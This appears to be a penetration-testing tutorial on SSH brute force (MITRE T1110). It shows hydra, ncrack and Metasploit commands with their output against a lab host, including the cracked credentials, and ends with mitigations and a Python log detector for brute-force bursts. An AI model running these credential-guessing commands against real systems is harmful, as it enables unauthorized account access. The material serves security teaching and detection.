Bruteforce: mitre -> T1110
Brute force is a technique that uses trial and error to guess login credentials.
Tools
These are some of the tools used to brute-force SSH credentials.
- hydra
- ncrack
- metasploit
hydra
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add.
Syntax
hydra -L [userfile] -P [password_file] ssh://[target_ip]
Brute-forcing the SSH protocol with hydra:
┌──(cyberkhalid㉿kali)-[~/pentest]
└─$ hydra -L user.txt -P pass.txt ssh://192.168.43.234
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-05 20:20:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 96 login tries (l:8/p:12), ~6 tries per task
[DATA] attacking ssh://192.168.43.234:22/
[22][ssh] host: 192.168.43.234 login: 'user1' password: 'user1'
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-06-05 20:20:59
Ncrack
Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Syntax
ncrack -U [userfile] -P [password_file] ssh://[target]
Brute-forcing the SSH protocol with ncrack:
┌──(cyberkhalid㉿kali)-[~/pentest]
└─$ ncrack -U user.txt -P pass.txt ssh://192.168.43.234
Starting Ncrack 0.7 ( http://ncrack.org ) at 2022-06-05 20:29 EDT
Discovered credentials for ssh on 192.168.43.234 22/tcp:
192.168.43.234 22/tcp ssh: 'user1' 'user1'
Ncrack done: 1 service scanned in 21.01 seconds.
Metasploit
Metasploit is an open source platform that supports vulnerability research, exploit development, and the creation of custom security tools.
Brute-forcing the SSH protocol with Metasploit:
msf6 auxiliary(scanner/ssh/ssh_login) > options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.43.234
rhost => 192.168.43.234
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /home/cyberkhalid/pentest/user.txt
user_file => /home/cyberkhalid/pentest/user.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /home/cyberkhalid/pentest/pass.txt
pass_file => /home/cyberkhalid/pentest/pass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > exploit
[*] 192.168.43.234:22 - Starting bruteforce
[+] 192.168.43.234:22 - Success: 'user1:user1' 'uid=1000(user1) gid=1000(user1) groups=1000(user1),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),134(sambashare) Linux user1-VirtualBox 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 2 opened (192.168.43.1:41713 -> 192.168.43.234:22) at 2022-06-05 20:40:02 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Using private keys
Brute-forcing the SSH protocol with Metasploit using SSH private keys:
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > options
Module options (auxiliary/scanner/ssh/ssh_login_pubkey):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_USERS false no Add all users in the current database to the list
KEY_PASS no Passphrase for SSH private key(s)
KEY_PATH no Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped. Duplicate private keys will be ignored.
PRIVATE_KEY /home/cyberkhalid/pentest/id no The string value of the private key that will be used. If you are using MSFConsole, this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and ECDSA private keys are supported.
RHOSTS 192.168.43.234 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME user1 no A specific username to authenticate as
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path /home/cyberkhalid/pentest/id
key_path => /home/cyberkhalid/pentest/id
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > set key_pass Passsword@123
key_pass => Passsword@123
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > exploit
[*] 192.168.43.234:22 SSH - Testing Cleartext Keys
[*] 192.168.43.234:22 - Testing 1 key from /home/cyberkhalid/pentest/id
[+] 192.168.43.234:22 - Success: 'user1:-----BEGIN RSA PRIVATE KEY-----
Mitigations
- Enforce password policies.
- Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed.
- Use multi-factor authentication.
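Each of the tools above leaves the same trace on the target: a burst of "Failed password" lines in sshd's log from one source address, often followed by an "Accepted" line when a guess works. The following Python detector is an added example, not code from the original page or from any of the tools it describes. It runs over constructed auth.log lines (labelled as such in the code), assumes OpenSSH's default "Failed password for ... from ... port ..." / "Accepted password|publickey for ..." message format, and assumes a year for the syslog timestamps, which carry none. It flags a source that accumulates a threshold of failures inside a sliding window, and flags separately the higher-priority case of a successful login from that source right after the burst.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of OpenSSH auth.log lines (not taken from the original page):
# a burst of failed password guesses from one source, then a successful login,
# followed by ordinary activity from another host.
SAMPLE_AUTH_LOG = """\
Jun  5 20:20:35 target sshd[1200]: Connection closed by 192.168.43.1 port 41700 [preauth]
Jun  5 20:20:36 target sshd[1201]: Failed password for invalid user admin from 192.168.43.1 port 41701 ssh2
Jun  5 20:20:36 target sshd[1202]: Failed password for invalid user admin from 192.168.43.1 port 41702 ssh2
Jun  5 20:20:37 target sshd[1203]: Failed password for root from 192.168.43.1 port 41703 ssh2
Jun  5 20:20:38 target sshd[1204]: Failed password for root from 192.168.43.1 port 41704 ssh2
Jun  5 20:20:39 target sshd[1205]: Failed password for user1 from 192.168.43.1 port 41705 ssh2
Jun  5 20:20:40 target sshd[1206]: Failed password for user1 from 192.168.43.1 port 41706 ssh2
Jun  5 20:20:41 target sshd[1207]: Accepted password for user1 from 192.168.43.1 port 41713 ssh2
Jun  5 20:25:10 target sshd[1300]: Failed password for user1 from 10.0.0.5 port 50001 ssh2
Jun  5 20:50:12 target sshd[1310]: Accepted publickey for user1 from 10.0.0.5 port 50002 ssh2: RSA SHA256:EXAMPLEFINGERPRINT
"""

ASSUMED_YEAR = 2022  # syslog timestamps carry no year; this is an assumption for the sample

# Matches OpenSSH's default authentication result lines; "invalid user" marks
# guesses against accounts that do not exist on the host.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line):
    """Return a dict for an sshd authentication line, or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=ASSUMED_YEAR)
    return {"ts": ts, "result": m.group("result"), "method": m.group("method"),
            "user": m.group("user"), "ip": m.group("ip")}


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold failed logins inside a sliding window,
    and any successful login from such an IP within one window of its last failure."""
    recent = defaultdict(list)   # ip -> [(ts, user), ...] failures still inside the window
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["ip"]]
        if ev["result"] == "Failed":
            q.append((ev["ts"], ev["user"]))
            # Drop failures that have aged out of the window.
            while q and ev["ts"] - q[0][0] > window:
                q.pop(0)
            if len(q) >= threshold and ev["ip"] not in flagged:
                flagged.add(ev["ip"])
                alerts.append({"type": "burst", "ip": ev["ip"], "failures": len(q),
                               "users": sorted({u for _, u in q}), "at": ev["ts"]})
        elif ev["ip"] in flagged and q and ev["ts"] - q[-1][0] <= window:
            # A credential worked right after a guessing burst: the alert to act on first.
            alerts.append({"type": "success_after_burst", "ip": ev["ip"],
                           "user": ev["user"], "method": ev["method"], "at": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

On the sample, the burst alert fires at the fifth failure and lists the usernames tried (a mix of non-existent and real accounts is typical of a wordlist run), and the "success_after_burst" alert fires for the password login that follows one second later; the single failure from 10.0.0.5 and its later key-based login stay below the threshold. The threshold and window are the knobs to tune against your own baseline of legitimate typos, and the same per-source counting is what an account-lockout or rate-limiting policy enforces on the host side.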